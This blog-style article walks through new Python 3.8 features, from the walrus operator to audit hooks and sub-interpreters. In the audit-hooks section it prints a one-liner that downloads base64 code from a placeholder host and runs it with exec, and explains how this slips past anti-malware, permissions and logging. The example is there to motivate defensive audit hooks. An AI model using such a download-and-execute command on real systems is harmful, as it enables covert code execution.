Python 3.8: what’s new and how to use it?
In this article, we’ll take an overview of the new features in Python 3.8.
1) Walrus operator (Assignment expressions)
We know you’ve been waiting for this one for a while. It goes back years, to the moment when Python deliberately prohibited using “=” as an expression. Some people liked this, as it helped avoid confusing = and == in conditions; others found it inconvenient to either repeat an expression or assign it to a variable first. So let’s go to an example.
As Guido points out, most programmers tend to write:
group = pattern.match(data).group(1) if pattern.match(data) else None
instead of
match = pattern.match(data)
group = match.group(1) if match else None
The first version runs the match twice and is therefore slower; still, it’s understandable why some programmers preferred it, as the two-line version clutters the code with an extra statement.
Now we have a third option:
group = match.group(1) if (match := pattern.match(data)) else None
It’s also quite useful in chains of if/elif cases, where it lets us avoid computing everything up front:
match1 = pattern1.match(data)
match2 = pattern2.match(data)
if match1:
result = match1.group(1)
elif match2:
result = match2.group(2)
else:
result = None
instead of that, we can write
if (match1 := pattern1.match(data)):
result = match1.group(1)
elif (match2 := pattern2.match(data)):
result = match2.group(2)
else:
result = None
which is more optimal, as the second match won’t be computed if the first one succeeds.
In general, I’m glad about this PEP (PEP 572): it adds a previously missing capability, and it uses a distinct operator, so it’s hard to confuse with ==.
However, it also makes it possible to write code that is valid but hard to read:
y0 = (y1 := f(x))
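Beyond conditionals, the walrus operator is handy in comprehensions, where it lets us keep the result of an expensive call without computing it twice per element. A minimal sketch (slow_double is a stand-in for any costly function):

```python
def slow_double(x):
    # Stand-in for an expensive computation we don't want to run twice.
    return x * 2

# Keep each doubled value only if it passes the filter, computing it once.
results = [y for x in range(5) if (y := slow_double(x)) > 4]
print(results)  # [6, 8]
```

Without :=, we would either call slow_double twice per element or fall back to an explicit for-loop with a temporary variable.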
2) Positional-only parameters
def f(a, b, /, c, d, *, e, f):
print(a, b, c, d, e, f)
anything before / is positional-only
anything after * is keyword-only
f(10, 20, 30, d=40, e=50, f=60)       # valid
f(10, b=20, c=30, d=40, e=50, f=60)   # error: b cannot be a keyword argument
f(10, 20, 30, 40, 50, f=60)           # error: e must be a keyword argument
The value of this feature can be explained in one sentence: it makes it easier for library authors to change their signatures later. Let’s look at an example.
def add_to_queue(item: QueueItem):
Now the author has to maintain this signature: renaming the parameter is no longer possible, as it would be a breaking change. Imagine that you now want to accept not just one item, but either a single item or a list of them:
def add_to_queue(items: Union[QueueItem, List[QueueItem]]):
or like so
def add_to_queue(*items: QueueItem):
This is something you couldn’t do before without breaking compatibility with previous versions. Now you can. It’s also more consistent with the builtins, which already use this approach; for instance, you can’t pass keyword arguments to the pow function:
>>> help(pow)
...
pow(x, y, z=None, /)
...
>>> pow(x=5, y=3)
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: pow() takes no keyword arguments
3) f-strings debug support
A small additional feature that gives us a concise replacement for the verbose f"name_of_variable={name_of_variable}" debugging pattern.
f"{chr(65) = }" => "chr(65) = 'A'"
Did you notice the = after chr(65)? That’s what does the trick: it gives us a short way of printing a variable together with its name using f-strings.
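A few more self-explanatory cases of the = specifier: it preserves the exact expression text and surrounding whitespace, works on arbitrary expressions, and still accepts a format spec after a colon.

```python
x, y = 10, 25
print(f"{x = }, {y = }")   # x = 10, y = 25
print(f"{x * y = }")       # x * y = 250
print(f"{x = :>8}")        # right-aligns the value to width 8
```

This replaces the old habit of writing `print("x =", x)` by hand when debugging.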
4) Native asyncio shell
Now, if we launch the shell as ‘python -m asyncio’, we no longer need asyncio.run() to run async functions: await can be used directly from the shell.
> python -m asyncio
asyncio REPL 3.8.0b4
Use "await" directly instead of "asyncio.run()".
Type "help", "copyright", "credits" or "license" for more information.
>>> import asyncio
>>> async def test():
...     await asyncio.sleep(1)
...     return 'hello'
...
>>> await test()
'hello'
5) Python runtime audit hooks
The Python runtime relies heavily on C. However, the code executed there is not logged or tracked in any way, which makes it hard for test frameworks, logging frameworks, and security tools to monitor and optionally limit actions taken by the runtime.
Now, the events produced during runtime execution can be watched, including those from the module import system, as well as any custom events.
The new API will look like the following
# Add an auditing hook
sys.addaudithook(hook: Callable[[str, tuple], None])
# Raise an event with all auditing hooks
sys.audit(str, *args)
Hooks cannot be removed or replaced. For CPython, hooks added from C are global, while hooks added from Python are only for the current interpreter. Global hooks are executed before interpreter hooks.
One particularly interesting and mostly untraceable exploit is to run something like this:
python -c "import urllib.request, base64;
exec(base64.b64decode(
urllib.request.urlopen('http://my-exploit/py.b64')
).decode())"
Such code is not scanned by most anti-malware programs, since they rely on recognizable code being downloaded or written to disk, and base64 is enough to bypass this. It also slips past protections such as file access control lists or permissions (no file access occurs), approved application lists (assuming Python has been approved for other uses), and automated auditing or logging (assuming Python is allowed to access the internet, or to reach another machine on the local network from which to obtain its payload).
With runtime audit hooks, we can decide how to react to any specific event: either log it or abort the operation entirely.
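A minimal sketch of the API (the event name myapp.delete_user is made up for illustration): a hook filters the firehose of runtime events for the ones it cares about, and application code can raise its own events with sys.audit. Note that once added, a hook stays installed for the life of the interpreter.

```python
import sys

seen = []

def audit_hook(event, args):
    # The hook receives every runtime event (imports, exec, file
    # opens, ...); react only to our own custom event. Raising an
    # exception here would abort the audited operation.
    if event == "myapp.delete_user":
        seen.append(args)

sys.addaudithook(audit_hook)

# Application code raises its own events alongside the built-in ones.
sys.audit("myapp.delete_user", "alice")
print(seen)  # [('alice',)]
```

A security tool would do the same thing for built-in events such as "exec" or "open", raising RuntimeError to block them outright.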
6) multiprocessing.shared_memory
It allows the same memory area to be used from different processes/interpreters, which can reduce the time spent serializing objects in order to transfer them between processes. Instead of serializing an object, sending it to a queue, and deserializing it on the other side, we can simply use memory shared with the other process.
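A minimal single-process sketch of the API; a real consumer would live in another process and attach to the block by its name.

```python
from multiprocessing import shared_memory

# Producer side: create a named block and write into its buffer.
shm = shared_memory.SharedMemory(create=True, size=16)
shm.buf[:5] = b"hello"

# Consumer side: attach to the same block by name (here, same process).
other = shared_memory.SharedMemory(name=shm.name)
data = bytes(other.buf[:5])
print(data)  # b'hello'

# Cleanup: every user closes its handle; the creator also unlinks.
other.close()
shm.close()
shm.unlink()
```

The name is the only thing that has to cross the process boundary, so the payload itself is never copied through a queue.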
7) Pickle protocol 5 with out-of-band data buffers
The pickle protocol 5 introduces support for out-of-band buffers where data can be transmitted separately from the main pickle stream, at the discretion of the communication layer.
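A hedged sketch of how a class can opt in (Blob and reconstruct are illustrative names): __reduce_ex__ wraps the large buffer in pickle.PickleBuffer so the communication layer can ship it separately, while older protocols fall back to an in-band copy.

```python
import pickle

def reconstruct(buf):
    # The buffer arrives either in-band (bytes) or out-of-band
    # (PickleBuffer); both support the buffer protocol.
    return bytes(buf)

class Blob:
    def __init__(self, data):
        self.data = data  # e.g. a large bytearray

    def __reduce_ex__(self, protocol):
        if protocol >= 5:
            return reconstruct, (pickle.PickleBuffer(self.data),)
        return reconstruct, (bytes(self.data),)

buffers = []
blob = Blob(bytearray(b"A" * 10_000))
# buffer_callback collects the buffers instead of copying them in-band,
# so the main pickle stream stays tiny.
stream = pickle.dumps(blob, protocol=5, buffer_callback=buffers.append)
restored = pickle.loads(stream, buffers=buffers)
print(restored == blob.data)  # True
```

The transport (a socket, shared memory, etc.) is then free to send `buffers` however it likes, zero-copy included.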
The previous two amendments are quite important for the following one. Unfortunately, it hasn’t been included in Python 3.8, as some work on merging old code remains to be done, but it could change our approach to parallel code in Python.
8) Sub-interpreters
Python threads do not run in parallel due to the GIL, whereas processes are resource-consuming: starting one takes 100–200 ms, and they use a large amount of RAM. Sub-interpreters are one thing that could address this: the GIL is meant to be per interpreter, so one interpreter wouldn’t affect the others, and starting one is lighter than starting a process (though still slower than launching a thread).
The main problem that arises is transferring data between interpreters, since they won’t share state the way threads do, so we need some form of communication between them. Pickle, marshal, or JSON can be used to serialize and deserialize objects, but that may be quite slow. One solution is to use shared memory, as with processes.
Sub-interpreters seem to be a solution to the long-standing GIL problem; however, there is still work to be done. Python still uses runtime state instead of interpreter state in some places; for example, the garbage collector works that way. So that, along with many other internal modules, needs to change before sub-interpreters can be fully used.
I hope the feature will be released in Python 3.9.
In conclusion, this version adds some nice syntactic sugar, as well as more serious amendments to the core libraries and the runtime. There are still many cool features that didn’t make it into the release, so we’ll wait for them in Python 3.9. Stay tuned and follow our blog updates.